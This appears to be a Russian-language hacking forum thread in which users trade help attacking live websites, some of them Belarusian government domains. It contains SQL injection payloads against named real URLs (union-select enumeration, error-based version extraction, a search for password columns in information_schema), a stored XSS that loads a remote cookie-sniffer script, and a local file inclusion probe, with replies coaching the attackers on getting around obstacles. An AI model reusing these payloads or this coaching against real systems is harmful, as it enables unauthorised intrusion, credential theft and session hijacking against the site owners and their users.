никак. из-за отсутсвия тэгов просто выпадает кусок js скрипта. хотя там есть пассиваная хсс: можешь попытаться выташить куки.
Просканировал сайт Vulnerability сканером нашел уязвимость (ошибка Mysql при ?id=1'), havij позволяет просмотреть все таблицы. А вот в браузере эта ошибка не отображается. Не подскажите почему так? зы. Извините за нубовский вопрос.
В исходном коде сведений об ошибке нет. При вводе news.php?id=1' открывается просто страничка news.php И havij, и vulnerability говорят что ошибка и с легкостью пользуются этой уязвимостью
Скорее всего там ошибка. Только в виду моей нубизны я не знаю как смотреть) Не подскажите, может есть какое то дополнение на Firefox для просмотра?
Врятли он отправлял POST запросы, там надо вручную указывать все параметры, а он не додумался бы ) Попробуй выключить редирект
Вот! Поставил оперу, отключил редирект и сработало. В ФФ почему то все равно перенаправлялось. Спасибо.
Ошибки не возникало потому что, в новых версиях FireFox кодирует ' как %27. Нужно патчить. Патч можно скачать тут: https://rdot.org/forum/showthread.php?t=1403
Это MySQL? _http://www.minprom.gov.by/organizacii?OKPO=24+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
Версию вывел, а как сейчас таблицы вывести, подскажите? _http://www.oim.by/en/department'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and' Duplicate column name '5.5.8'
Нашел активку на одном сайте...нет фильтра имени и фамилии. но стоит ограничение по символам. я разбиваю код на две части...пихаю...получается такая штука <script src=http://адрес-снифера .ru/js.js></script> перед .ru стоит пробел и естественно снифер не срабатывает. как можно изловчиться и исправить?
+union+select+1,2,column_name,4,5,6+from+information_schema.columns+where+column_name+Like'%pass%'+limit+0,20+--+ подскажите а как теперь узнать из каких именно таблиц вывелись колонки?? например вывел "password" а название таблицы у этой колонки как узнать
Code: http://www.stroyserver.ru/tender/index.php?id=10294981&background=FFFFFF&parent=rubricator&child=../index немного не понял ошибку, объясните
index.php: PHP: include 'include/include.php'; include 'some/' . $_GET[child] . '.php'; include/include.php: PHP: [...] function strips(){/*whatever*/} [...] index.php? функция и так обозначается, и инклудя свой же файл ты вызываешь обозначение той же самой функции, но т.к. она уже обозначена ты получаешь ошибку.
Сразу выводи название таблиц и колонок, чтобы их потом отдельно не смотреть. UPD: Konqi уже ответил не заметил
